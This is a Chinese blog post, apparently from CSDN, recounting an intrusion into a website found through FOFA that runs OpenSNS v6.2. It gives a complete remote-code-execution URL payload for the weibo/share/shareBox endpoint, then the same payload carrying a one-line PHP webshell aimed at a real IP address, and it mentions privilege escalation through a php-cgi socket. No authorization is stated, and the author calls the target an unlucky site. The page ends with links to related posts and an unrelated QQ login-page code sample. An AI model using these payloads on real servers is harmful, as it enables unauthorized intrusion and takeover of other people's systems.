一次渗透测试......OpenSNS的漏洞

最新推荐文章于 2024-01-26 14:33:15 发布
最新推荐文章于 2024-01-26 14:33:15 发布
阅读量1.3k 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/119546542
版权

fofa上直接找,找到某倒霉的站。
直接搜索OpenSNSv 6.2

首先开始试一试前台rce

index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=phpinfo()%26id[0]=jiang

直接打通
在这里插入图片描述看版本号5.4,一会提权要用
然后直接上马

http://106.54.23.125/index.php?s=weibo/share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[method]=-%3E_validationFieldItem%26id[status]=1%26id[4]=function%26id[1]=assert%26id[args]=jiang=@eval($_POST[cmd])%26id[0]=jiang

找到这个目录/tmp/php-cgi-54.sock

在这里插入图片描述进行提权
在这里插入图片描述
写入连接
在这里插入图片描述
在这里插入图片描述
成功提权。
参考

https://xz.aliyun.com/t/9936

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手把手教你,如何搭建漏洞靶场
2301_77472496的博客
08-24 323
​​​​​​​​至此,基本完成DVWA靶场的搭建。由于一些默认设置,这个时候的靶场还是处于状态的,下面跟着我一起解决2,3个小问题,将打开。​​​​。
Web渗透漏洞靶场收集
VN520的博客
12-30 334
如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些入门Web安全必不可错过的靶场。AWVS的测试站点,用于扫描效果验证,提供了多场景的公网靶场,也常作为漏洞利用演示的目标。Web安全入门必刷的靶场,包含了最常见的web漏洞,界面简单易用,通过设置不同的难度,可更好地理解漏洞的原理及对应的代码防护。
Web漏洞靶场搭建
m0_56632799的博客
07-19 3319
小白学习网安之Web漏洞靶场
01. Web漏洞靶场的搭建
weixin_43909650的博客
12-13 2063
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
安全测试漏洞靶场实战
HUA6911的博客
01-26 588
安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的产品、网站更好的保驾护航,而如果心术不正,利用安全漏洞去做一些未法牟利,则容易造成承担不必要的违法责任。在日常很容易被大家忽略的一点,在非授权的情况下,对网站进行渗透攻击测试,也是属于非合规操作,是触及法律法规的。
opensns v6.2.0前台RCE漏洞分析
weixin_40484719的博客
10-16 2906
最近准备进一步学习下代码审计,因此打算找些历史漏洞分析学习下。(啥时候我也能挖出前台rce呢 本次漏洞的入口点在于 Application/Weibo/Controller/ShareController.class.php的shareBox方法。 Application/Weibo/Controller/ShareController.class.php share控制器获取外部输入$query,并将它用parse_str解析后交给$array,这里其实就相当于传入了一个数组。接下...
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 3394
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
opensns 命令执行 (CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1247
opensns 命令执行 (CNVD-2021-34590)漏洞复现
opensns综合性社交软件系统存在远程命令执行高危漏洞
weixin_68647219的博客
08-01 3452
opensns综合性社交软件系统远程命令执行高危漏洞,该漏洞是由于漏洞入口在 weibo/share/sharebox通过 get请求提交query参数存在变量覆盖,可能导致攻击者通过漏洞发送特定的请求包执行任意命令。
OpenSNS 远程执行任意命令漏洞
未花的博客
12-01 274
status必须等于1,值里必须要app、model、method
OpenSNS微社区 6.0.0.zip
05-27
OpenSNS微社区是一款综合性社交软件,您可以使用OpenSNS快速搭建一个类似新浪微博一样的功能强大的社交网站,您的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用,除此之外,OpenSNS还提供云...
OpenSNS PHP开源社区交友系统 v2.8.1.rar
07-10
OpenSNS PHP开源社区交友系统,一个反馈不错的PHP交友系统,OpenSNS包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版等多种平台...
OpenSNS-2.6.0安装教程及完整PHP源码下载.txt
07-17
OpenSNS是php语言的开源社交源码系统,用户交互界面简洁大方,包含功能有微博、论坛、积分商城、群组、充值中心、分类信息、微店等,可以快速搭建社交类网址。
BingSNS社交互动平台 社区型.rar
07-06
QQ:http://connect.opensns.qq.com/ 开放平台申请应用服务。 然后把申请通过的 App_Key 和 App_Secret 对应的替换 Include 文件夹下的: Class_Api_Sina.asp(新浪微博APP,用记事本打开对应替换相应的参数)...
基于PHP的OpenSNS轻量级社交平台 php版.zip
07-22
基于PHP的OpenSNS轻量级社交平台 php版.zip
漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 597
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令。
openSNS(V2版本) 用户身份切换可能产生的bug以及正规流程
F_shan的博客
07-29 932
openSNS V2版本注册用户的身份切换有一个严格的流程,不是通过这个流程切换用户身份会造成登入和提示身份未审核或禁用提示,影响体验。在此我会给出身份切换的流程:
opensns html5,记对OpenSNS一次代码审计
weixin_29289821的博客
06-28 286
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。我在FreeBuf上每天都可以学到很多新思路新技术,感谢这个平台,为了回馈FreeBuf的小伙伴们,写下这篇文章,希望在可以为奋斗在网络安全路上的小伙伴们提供一些新奇小思路,其实挖洞并不难,也希望大家能把分享的精神发扬光大。概述OpenSNS是想天科技开发的一款综合性社交软件。您可以...
基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
最新发布
06-01
web期末作业设计网页 基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
请帮我写一个qq电脑端登录界面
06-09
抱歉,我无法提供视觉上的内容,但我可以提供一个简单的HTML和CSS代码示例,你可以根据这个示例进行修改和改进: HTML代码: ```html <!DOCTYPE html> <html> <head> <title>QQ登录</title> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div class="login-box"> <img src="https://qzonestyle.gtimg.cn/qzone/vas/opensns/res/img/Connect_logo_1.png" class="avatar"> <h1>QQ登录</h1> <form> <label for="username">QQ号码或手机或邮箱</label> <input type="text" id="username" name="username" placeholder="输入QQ号码或手机或邮箱"> <label for="password">密码</label> <input type="password" id="password" name="password" placeholder="输入密码"> <input type="submit" value="登录"> <a href="#">忘记密码?</a> </form> </div> </body> </html> ``` CSS代码: ```css body { font-family: sans-serif; background-color: #f5f5f5; } .login-box { width: 350px; height: 420px; background-color: #fff; margin: 100px auto; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.3); } .avatar { display: block; width: 80px; height: 80px; margin: 0 auto; border-radius: 50%; margin-top: -60px; margin-bottom: 30px; } h1 { font-size: 24px; text-align: center; margin-bottom: 20px; } form { display: flex; flex-direction: column; } label { font-size: 16px; margin-bottom: 5px; } input[type="text"], input[type="password"] { padding: 10px; margin-bottom: 20px; border-radius: 5px; border: none; box-shadow: 0 0 5px rgba(0, 0, 0, 0.1); } input[type="submit"] { background-color: #3385ff; color: #fff; padding: 10px; border: none; border-radius: 5px; cursor: pointer; } a { font-size: 14px; text-align: center; margin-top: 20px; color: #3385ff; text-decoration: none; } ``` 这只是一个简单的示例代码,你可以根据自己的需要进行修改和添加。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值